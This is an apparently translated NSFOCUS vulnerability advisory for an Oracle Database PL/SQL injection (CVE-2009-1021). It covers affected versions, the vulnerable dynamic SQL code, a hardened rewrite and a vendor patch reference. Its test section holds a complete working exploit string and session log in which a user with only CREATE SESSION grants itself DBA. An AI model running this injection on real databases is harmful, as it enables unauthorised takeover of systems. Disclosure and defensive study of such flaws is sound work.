Security Vulnerability
Oracle Advanced Replication Component REPCAT_RPC.VALIDATE_REMOTE_RC() Function Privilege Escalation Vulnerability

Published: 2009-07-14
Updated: 2009-11-05

Affected systems:
Oracle Database 9.2.0.8DV
Oracle Database 9.2.0.8
Oracle Database 10.2.0.3
Oracle Database 10.1.0.5
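Description:
BUGTRAQ ID: 35685
CVE ID: CVE-2009-1021

Oracle Database is a large commercial database system.

The REPCAT_RPC.VALIDATE_REMOTE_RC() function in the Advanced Replication component of Oracle Database executes an anonymous PL/SQL block whose content may be attacker-controlled. The function takes the name of the currently logged-in user as its first parameter; the second parameter, VALIDATE_STRING, is placed directly into an anonymous PL/SQL block and executed: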

...
...
SQL_CURSOR := DBMS_SQL.OPEN_CURSOR;
DBMS_SQL.PARSE(SQL_CURSOR, 'BEGIN ' || ' :err :=
sys.dbms_repcat_validate.' || VALIDATE_STRING || '(:canon_gname);' || '
END;', DBMS_SQL.V7);
DBMS_SQL.BIND_VARIABLE(SQL_CURSOR, 'err', ERR);
DBMS_SQL.BIND_VARIABLE(SQL_CURSOR, 'canon_gname', CANON_GNAME);
DUMMY := DBMS_SQL.EXECUTE(SQL_CURSOR);
...
...

This may allow an attacker to execute arbitrary code with elevated privileges.
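
A hardened form of the dynamic call shown above, as an added example (not Oracle's patched code and not part of the original advisory): the routine name is checked with DBMS_ASSERT.SIMPLE_SQL_NAME and an allowlist before it is concatenated. The package demo_validate and the function run_validation are hypothetical stand-ins for sys.dbms_repcat_validate and VALIDATE_REMOTE_RC.

```sql
-- Stand-in for sys.dbms_repcat_validate (hypothetical package, demo only).
CREATE OR REPLACE PACKAGE demo_validate AS
  FUNCTION validate_grp_objects_local(canon_gname IN VARCHAR2) RETURN NUMBER;
END demo_validate;
/
CREATE OR REPLACE PACKAGE BODY demo_validate AS
  FUNCTION validate_grp_objects_local(canon_gname IN VARCHAR2) RETURN NUMBER IS
  BEGIN
    RETURN 0;  -- constructed result: 0 = no validation error
  END;
END demo_validate;
/
-- Hardened dispatcher (hypothetical name). Invoker rights: the dynamic block
-- runs with the caller's privileges instead of the owner's.
CREATE OR REPLACE FUNCTION run_validation(
  validate_string IN VARCHAR2,
  canon_gname     IN VARCHAR2) RETURN NUMBER
  AUTHID CURRENT_USER
IS
  sql_cursor INTEGER;
  err        NUMBER;
  dummy      INTEGER;
  routine    VARCHAR2(130);
BEGIN
  -- Reject anything that is not one simple SQL name (raises ORA-44003).
  routine := UPPER(DBMS_ASSERT.SIMPLE_SQL_NAME(validate_string));
  -- Allowlist: only known routine names are ever concatenated.
  IF routine NOT IN ('VALIDATE_GRP_OBJECTS_LOCAL') THEN
    RAISE_APPLICATION_ERROR(-20001, 'validation routine not allowed');
  END IF;
  sql_cursor := DBMS_SQL.OPEN_CURSOR;
  DBMS_SQL.PARSE(sql_cursor,
    'BEGIN :err := demo_validate.' || routine || '(:canon_gname); END;',
    DBMS_SQL.NATIVE);
  DBMS_SQL.BIND_VARIABLE(sql_cursor, 'err', err);
  DBMS_SQL.BIND_VARIABLE(sql_cursor, 'canon_gname', canon_gname);
  dummy := DBMS_SQL.EXECUTE(sql_cursor);
  DBMS_SQL.VARIABLE_VALUE(sql_cursor, 'err', err);
  DBMS_SQL.CLOSE_CURSOR(sql_cursor);
  RETURN err;
EXCEPTION
  WHEN OTHERS THEN
    IF DBMS_SQL.IS_OPEN(sql_cursor) THEN
      DBMS_SQL.CLOSE_CURSOR(sql_cursor);
    END IF;
    RAISE;
END run_validation;
/
```

A VALIDATE_STRING value containing parentheses, semicolons or spaces fails the DBMS_ASSERT check with ORA-44003 before any dynamic PL/SQL is parsed.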

<*Source: David Litchfield (david@nextgenss.com)
  
  Links: http://www.databasesecurity.com/oracle/plsql-injection-create-session.pdf
         http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2009.html
*>

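Test method:

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!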

SQL> CONNECT TESTUSER/QWERT124
Connected.
SQL> SELECT PRIVILEGE FROM SESSION_PRIVS;
PRIVILEGE
----------------------------------------
CREATE SESSION
SQL> SET ROLE DBA;
SET ROLE DBA
*
ERROR at line 1:
ORA-01924: role 'DBA' not granted or does not exist
SQL> EXEC SYS.GET_OWNER('AAAA''||DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC
(USER,''VALIDATE_GRP_OBJECTS_LOCAL(:canon_gname); execute immediate
''''declare pragma autonomous_transaction;
begin execute immediate ''''''''grant dba to testuser'''''''';
end;''''; end;--'',''CCCC'')||''AAAA');
PL/SQL procedure successfully completed.
SQL> SET ROLE DBA;
Role set.
SQL> SELECT PRIVILEGE FROM SESSION_PRIVS;
PRIVILEGE
----------------------------------------
ALTER SYSTEM
AUDIT SYSTEM
CREATE SESSION
ALTER SESSION
...
...
MANAGE ANY FILE GROUP
READ ANY FILE GROUP
CHANGE NOTIFICATION
CREATE EXTERNAL JOB
160 rows selected.
SQL>

Recommendation:
Vendor patch:

Oracle
------
Oracle has released a security advisory (cpujul2009) and corresponding patches for this issue:
cpujul2009: Oracle Critical Patch Update Advisory - July 2009
Link: http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2009.html

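This vulnerability advisory was translated and compiled by NSFOCUS. All rights reserved; reproduction without permission is prohibited.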